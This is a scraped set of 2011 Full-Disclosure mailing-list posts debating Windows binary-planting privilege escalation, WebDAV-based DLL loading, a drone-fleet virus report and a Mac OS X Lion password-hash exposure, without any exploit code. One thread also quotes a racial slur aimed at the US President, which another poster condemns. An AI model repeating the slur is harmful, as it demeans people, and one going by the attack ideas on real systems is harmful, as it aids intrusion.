Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Per request. From: andrew.wallace [mailto:andrew.wall...@rocketmail.com] Sent: Monday, October 10, 2011 11:50 AM To: Christian Sciberras; full-disclosure; Thor (Hammer of God); Elazar Broad; Michael Schmidt; Michael T Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” On Mon, Oct 10, 2011 at 12:51 PM, Christian Sciberras uuf6...@gmail.commailto:uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fish if you ask me. Chris. Locating the storage device infecting the systems, and tracking every military personnel and contractor who has had contact with the drones will take some time. That was the problem with WikiLeaks and Stuxnet, but now new rules are being introduced by the White House to speed up this process. https://www.nytimes.com/2011/10/07/us/politics/white-house-orders-new-computer-security-rules.html --- Andrew Wallace Independent consultant www.n3td3v.org.ukhttp://www.n3td3v.org.uk/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
No offense intended??? How you expect to refer to the President of the United States as a nigger and NOT offend people? You crossed WAY over the line on that one, joro. WAY over. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, October 06, 2011 10:22 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules risking n3td3v fate, sorry for offtopic. the nigger said [1] (no offense intended to black people): American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hashdays, Lucerne?
Hey, who all is going to Hashdays at the end of the month? I'm wondering what kind of attendance we'll see from the FD crowd... t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.commailto:tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, mailto:kz2...@googlemail.comkz2...@googlemail.commailto:kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: mailto:full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk To: mailto:security-bas...@securityfocus.com security-bas...@securityfocus.commailto:security-bas...@securityfocus.com To: mailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitterhttps://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn | GitHubhttp://github.com/tbiehn | http://www.travisbiehn.com TravisBiehn.comhttp://TravisBiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS... T On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.commailto:tbi...@gmail.com wrote: GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD mailto:doo...@gmail.comdoo...@gmail.commailto:doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / http://crazycoders.com crazycoders.comhttp://crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) mailto:t...@hammerofgod.comt...@hammerofgod.commailto:t...@hammerofgod.com wrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn mailto:tbi...@gmail.comtbi...@gmail.commailto:tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, mailto:kz2...@googlemail.commailto:kz2...@googlemail.comkz2...@googlemail.commailto:kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: mailto:full-disclosure-boun...@lists.grok.org.uk mailto:full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk To: mailto:security-bas...@securityfocus.com mailto:security-bas...@securityfocus.com security-bas...@securityfocus.commailto:security-bas...@securityfocus.com To: mailto:full-disclosure@lists.grok.org.uk mailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full
[Full-disclosure] FW: Apple Lion OS Suffers From A Major Security Issue
FYI From: Raging Hagis Sent: Wednesday, September 21, 2011 7:21 AM To: Thor (Hammer of God) Subject: Apple Lion OS Suffers From A Major Security Issue Apple’s Lion OS X stores passwords insecurely, with the updated OS appearing to be more vulnerable than its previous Snow Leopard and Leopard versions, according to a BetaNews report. Apple's OS X passwords can only be changed by a computer's administrator. The OS encrypts them and then stores them as shadow files on the disk drive in what should be a secure location. Defence in Depth security blog identified the running issue in 2009, which was evident in versions 10.4, 10.5 and 10.6, and blogged that the issue is still prevalent in Lion. However it's even easier to steal computer passwords in Lion. In previous versions of OS X, administrator privileges were needed to make the hack work. In Lion, any user can search the directory for the hash file, which is the file needed to decode the encryption. It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked, Defence in Depth's Patrick Dunstan wrote. Dunstan recognised that users without admin clearance won't be able to access the hash file directory, but it isn't needed when the hash data is accessible from directory services. The issue would be much worse if the data could be accessed remotely, with hackers easily stealing catalogues of security passwords. Still, the fact the passwords are accessible locally is a big issue for Apple's OS, considering the security prone software is meant to be the world's most advanced desktop operating system according to Apple. In the meantime, Mac users should disable all guest accounts and automatic login, so the computer requires an admin password at each start up. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
The interesting part about this type of attack is that the attacker can run a webdav server to run the exploit. This is a normal looking url, not some incredibly obvious UNC path to an SMB share. Yes, like most client-side attacks, it may require some social engineering, hijacking of a domain, and etc. However, there's more to it than just downloading some random file from a stranger, it can be used in a decent combination by a well-designed attack. A good example is one that ACROS actually reported on (haven't verified myself, so going on their word). Check it out: Except that you would have to mount the WebDAV point or access it via a WebDAV-aware redirector, right? If you navigate to a file within a WebDAV folder simply with IE via a URL, IIS (or whatever your WebDAV environment is) is going to just feed it to the browser like it would any other file. Now, if you are talking about something like Win 7 NET.EXE's ability to actually map a drive letter or SMB-like resource to a WebDAV folder, that is something else, and you would of course have to get the user to issue a net use command or connect to the WebDAV folder as a network drive.I'm not actually sure the net redirector for webdav would even allow that over an anonymous connection, and even basic auth requires HTTPS of course which won't work unless the certificates are trusted. Now if what you are saying is this exploit has merit because you can use WebDAV after getting the user to mount the webdav point first and then get them to execute the file or get them to issue a net use command against the webdav folder via HTTPS with the target cert begin trusted, and after that get them to open the file in question so that you can, in turn, take advantage of the aforementioned conditions to then load the malicious dll via loadlibrary, then I guess I would question how critical of a security vulnerability that is. I would suggest that if one is actually considering this to be a real issue, one might better consider that all you have to do is get the user to just open up an exe remotely. It's the same thing at the end of the day. Or did I misunderstand the WebDAV configuration you've used? t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/